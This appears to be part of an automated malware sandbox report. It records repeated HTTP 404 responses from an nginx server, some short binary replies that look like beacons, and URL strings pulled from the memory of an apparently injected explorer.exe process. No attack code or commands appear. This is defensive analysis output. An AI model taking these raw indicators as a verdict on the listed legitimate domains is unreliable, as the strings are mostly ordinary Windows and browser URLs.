      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 22:20:19 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 22:20:20 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 22:20:21 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 22:20:22 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 22:20:23 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 22:20:23 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 22:20:24 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 22:20:25 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 22:20:26 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 22:21:33 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 22:21:35 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 22:21:37 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 22:21:39 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 22:21:52 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 22:22:08 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 22:22:29 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 22:22:52 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 22:23:18 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: explorer.exe, 00000001.00000000.1779684746.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1777426774.00000000079FB000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
      Source: explorer.exe, 00000001.00000000.1779684746.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1777426774.00000000079FB000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
      Source: explorer.exe, 00000001.00000000.1779684746.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1777426774.00000000079FB000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
      Source: explorer.exe, 00000001.00000000.1779684746.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1777426774.00000000079FB000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
      Source: explorer.exe, 00000001.00000000.1777426774.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
      Source: explorer.exe, 00000001.00000000.1778417663.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1780694925.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1778954174.0000000008720000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://schemas.micro
      Source: explorer.exe, 00000001.00000000.1783714743.000000000C964000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J
      Source: explorer.exe, 0000000C.00000003.2706066309.0000000003441000.00000004.00000020.00020000.00000000.sdmp, DF4B.tmp.12.dr | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
      Source: explorer.exe, 00000001.00000000.1783714743.000000000C893000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
      Source: explorer.exe, 00000001.00000000.1777426774.00000000079FB000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/Vh5j3k
      Source: explorer.exe, 00000001.00000000.1777426774.00000000079FB000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/odirmr
      Source: explorer.exe, 00000001.00000000.1783714743.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://android.notify.windows.com/iOS
      Source: explorer.exe, 00000001.00000000.1779684746.00000000097D4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/
      Source: explorer.exe, 00000001.00000000.1779684746.00000000097D4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/q
      Source: explorer.exe, 00000001.00000000.1775685561.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1776398835.0000000003700000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
      Source: explorer.exe, 00000001.00000000.1779684746.00000000096DF000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
      Source: explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
      Source: explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1779684746.00000000097D4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
      Source: explorer.exe, 00000001.00000000.1779684746.00000000096DF000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://arc.msn.comi
      Source: explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
      Source: explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
      Source: explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
      Source: explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
      Source: explorer.exe, 0000000C.00000003.2706066309.0000000003441000.00000004.00000020.00020000.00000000.sdmp, DF4B.tmp.12.dr | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
      Source: explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
      Source: explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
      Source: explorer.exe, 00000001.00000000.1777426774.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
      Source: explorer.exe, 00000001.00000000.1777426774.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
      Source: explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
      Source: explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
      Source: explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
      Source: explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
      Source: explorer.exe, 0000000C.00000003.2706066309.0000000003441000.00000004.00000020.00020000.00000000.sdmp, DF4B.tmp.12.dr | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
      Source: explorer.exe, 0000000C.00000003.2706066309.0000000003441000.00000004.00000020.00020000.00000000.sdmp, DF4B.tmp.12.dr | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
      Source: explorer.exe, 0000000C.00000003.2706066309.0000000003441000.00000004.00000020.00020000.00000000.sdmp, DF4B.tmp.12.dr | String found in binary or memory: https://duckduckgo.com/ac/?q=
      Source: explorer.exe, 0000000C.00000003.2706066309.0000000003441000.00000004.00000020.00020000.00000000.sdmp, DF4B.tmp.12.dr | String found in binary or memory: https://duckduckgo.com/chrome_newtab
      Source: explorer.exe, 0000000C.00000003.2706066309.0000000003441000.00000004.00000020.00020000.00000000.sdmp, DF4B.tmp.12.dr | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
      Source: explorer.exe, 00000001.00000000.1783714743.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://excel.office.com
      Source: explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
      Source: explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
